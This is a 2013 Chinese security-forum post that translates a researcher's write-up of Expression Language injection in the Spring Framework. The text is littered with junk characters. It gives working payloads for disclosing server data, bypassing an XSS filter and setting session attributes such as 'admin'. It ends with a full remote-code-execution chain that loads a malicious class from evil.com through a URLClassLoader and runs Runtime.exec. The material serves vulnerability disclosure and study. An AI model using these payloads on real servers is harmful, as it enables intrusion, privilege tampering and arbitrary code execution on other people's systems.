找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2332|回复: 0
打印 上一主题 下一主题

spring-远程代码注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:47:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Remote Code with
5 \' \6 s2 i) {$ ]  N% F; R8 u6 IExpression Language Injection
! J' \  _6 o7 S8 J* \Spring Framework脆弱性—DanAmodio3 E" w' t; n: J$ `# i% }, i
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中5 K9 ?* \9 p7 p4 u* z) b7 c/ D
可能会存在风险。
' }# `& O" M, m6 y' m% o  B* u2 a在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的* O$ `- h( v9 x) \6 J' l- O7 C5 `
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
! M4 S# W0 e, M以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,( K+ F1 B$ c0 q2 P  J! O
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前/ h0 t* z; G' z4 N' k/ `, S: u
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。6 u" h4 @5 p  y+ z$ c
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但( R4 ?- w4 ~! c% o) w. u
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版
; f" v0 ~5 i" Y7 L6 O5 O& S本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。% [9 a) Q; h7 [
这些版本不支持禁用double EL resolution.
7 k6 z9 }' ^5 ~这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含- U1 x" z+ i  I& T3 @
EL2.2容器上可能进行远程代码执行。
' U/ G2 b4 T% l5 b1 R) c  a这是一个原始信息泄露的攻击例子:( n& f& L; p. F0 S
请求:
8 w+ {1 O$ U+ o0 B+ _ttp://vulnerable.com/foo?message=${applicationScope}- T! E' J- ~1 M
到达以下内容页面:
) U0 b; l' h3 p. D, I结果将输出一些包含内部服务器信息calsspath 和本地工作目录2 b7 \. ^: Y! D$ W2 l' q
你也可以做一些其他事情,如这样:
+ U) u3 d& \8 n7 N/ z" T9 ^${9999+1}
% N0 M& B& _: n/ e2 ?5 {还可以访问session 对象和beans8 N* i7 l5 `4 _; T. ]
${employee.lastName}
, b! t$ v# F  ]* q7 F9 S5 x4 i在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
: _! U. A  K# `1 X) _0 ?2 w9 N0 p) xEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东8 s- C" ~& o- l; g6 n
西,比如XSS.. N9 o9 d& c2 G# p1 ^, R- u
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签" P# L% j+ ~; g
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤' ]& Z# ~$ u0 R; @/ T& W2 S% V4 ?; [
呢?”
) }- Y8 W* }1 T+ y因此,我尝试巳缦拢�4 L: A* x; x6 @  q
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP* Y- J% W) d; @
P
' H5 }  l0 ~# e7 ]7 y6 _( @我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
& U: t+ s  o# [! Z3 ^1 l* U5 G回的文本被插入进了spring:message 标签。. f, N) d/ o, b/ G$ y
这里是一个最终绕过过滤的实例:
8 K9 ?9 n9 h7 ?" N" fhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1)/scriptQ
$ s" {8 B: A' |# Y( c6 X它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为6 ?' r4 N" l6 o5 A6 g- k
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
- q% h6 U% O) ]' C6 K8 @经过一番研究,我学习到EL2.2 增加了方法调用。
7 l% i. C4 g) T& i1 ^我写了一个快速测试应用程序代码并且检测一些功能- A8 B& i2 b& M( _- \; [1 r# E& o  W
${pageContext.request.getSession().setAttribute(“account”,”123456″)}4 H/ r+ F  S9 V7 D( Y, [
${pageContext.request.getSession().setAttribute(“admin”,true)}
& H) s$ w6 i  O: ^5 T4 F  l! C* i' b好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的* Y: Y4 N+ U6 f/ k8 i$ R
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
6 L  H6 k# L0 k, h+ X${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1+ R- |0 e3 v9 g7 l
“, 1234)}. L3 Z9 D: X. j2 X( ?9 j: o' X
${“”.getClass().forName(“java.lang.Runtime”)}
5 G! g  F# l# s$ J1 E& r: X哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不( ]& g% H  B2 W6 A6 j* _7 \
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函8 @( ^& h) G' H6 n5 y/ a; F
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有6 N, P7 b5 [/ B( z7 m
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于3 k( Y, ~0 ]7 Q4 c1 L0 k* M
方法签名invoke(Object obj, Object„ args)
' C; Y; N+ i- dJeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
( ]  `! M9 b2 A3 A9 [% ?( H题,以让它可以工作起来。
" e# z( {. w4 I9 Q% S( c/ |漏洞利用:
+ H* r1 d- X2 P7 w我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
) @  |2 v4 H/ H% |; |. t- R希望你们中的一些JAVA奇才告诉我我是如此的可笑。5 r* T/ S- R' Z6 v* N# p" C2 B
这里有一些我试过的失败的用例,为了试图让它工作的用例:7 r8 K: U$ N3 O$ w2 \
 写文件到文件系统1 P3 p- _$ X6 f0 f7 Y
 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
% C% h6 q& G( {' I' p9 x/ m我认为这些可以很好的工作,但是我不能找到合适的类来载入。/ }  x' c( h" k5 V
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}* {. q1 s5 [3 T
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
& h% ^; a) l7 _9 ]2 \2 Z. q2 Forg.springframework.expression.spel.standard.SpelExpressionParser not found# W) h. @. a8 j! S. @. |! ]
by) L9 u3 x" V% n/ i( t! C# x6 f  U
org.glassfish.web.javax.servlet.jsp [194].
) `; B; q; z5 m) N$ m4 o 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
. a. b1 @5 c: u 利用反射来创建一个新的Runtime(and watch the world burn)
4 B& F2 {: ~' A, u- w1 l; ]/ l( k${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
( x* q( X$ m9 [/ {2 D(“java.lang.Runtime”)).getDeclaredConstructors()[0])}- p% D% \* N- }
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}; k, M6 X2 z! z5 B4 ~
 使用java.lang.ProcessBuilder
; k' n! Q6 a, {5 H 用表达式语言来评估表达式语言
1 M, z) T: ~0 ^9 |7 MExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
# v0 J) R# V+ X${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request: e0 f* p) h" _$ H: ^# y
“,”".getClass(),null)}' T- h2 J  P# K! \* g3 Y  }& r
 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
- Z9 a: h7 F0 J$ ^) ^2 ~0 Y我在使用一个空数组通过Method.invoke()时失败了很多次
; N2 Z: k* t$ _" u/ B3 {0 I“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
% t# B" [& l( P( g' p4 H.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A' l% F( K6 V- t* J/ @& J6 p- c( O
rrayList”).newInstance().toArray())0 a  k& d% e0 m  P" D& n1 k) ]3 e/ y
java.lang.IllegalArgumentException: wrong number of arguments
7 O/ S/ p; g. u* B1 H( g最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可5 Q6 S+ r- s4 |5 ~$ h5 T! {2 @+ C
以创建一个恶意class文件并且指向类装载器.* B7 U+ O; N- p! W+ U
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
" N" y6 x& \! X% Lpublic class Malicious {
: [. J1 y/ S( \5 z  U5 tpublic Malicious() {9 o4 Q' V) a/ t% @7 f  Q
try {
: F4 F, `- }0 [" o1 I- b* mjava.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
* R; t. s  S) A. Cjava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
' P; i! U+ h  v8 k} catch (Exception e) {
5 K" `& k# a2 P+ G3 P- s$ n$ _- m9 {}0 {8 v$ p- z& l' o' @
}$ I4 N1 Z- R1 L( L  m  S9 p% o
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
* R7 _9 X  @+ L. q3 N话中,因此它可以被使用.; n( N# W1 M. v% e* T2 R; r
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
4 \  S' k' a$ @(“java.util.ArrayList”).newInstance())}
, e1 g: ~9 z0 X% p) J5 E( @1 zURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建3 W. h& H8 T# Z4 Q
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和4 O5 s$ [6 o4 G7 ^  s5 b; E) M
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个3 i+ g( A$ `& `; A+ s
我们可以调用的create(string)方法,然后转换对一个URL对象。* n0 o: ^3 G" U" h8 Z0 O
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
% q* F3 b3 U& ~; {! nere/malicious/classfile/is/located/”).toURL())}
' C6 y; j, k" {% o- V- f. K+ ?! R8 F/ z然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
+ X, d" G0 h* t0 G/ V3 m恶意类文件被装载并创建,触发远程代码.8 c, I8 ?: {! f2 ~/ X
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
- \' [1 E( C4 I6 ~( w% y5 gxt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().9 Q5 B. Y5 ?3 Q+ Q) k1 a$ m; R
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
, P! J' k4 m2 U/ _: m! {()}
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表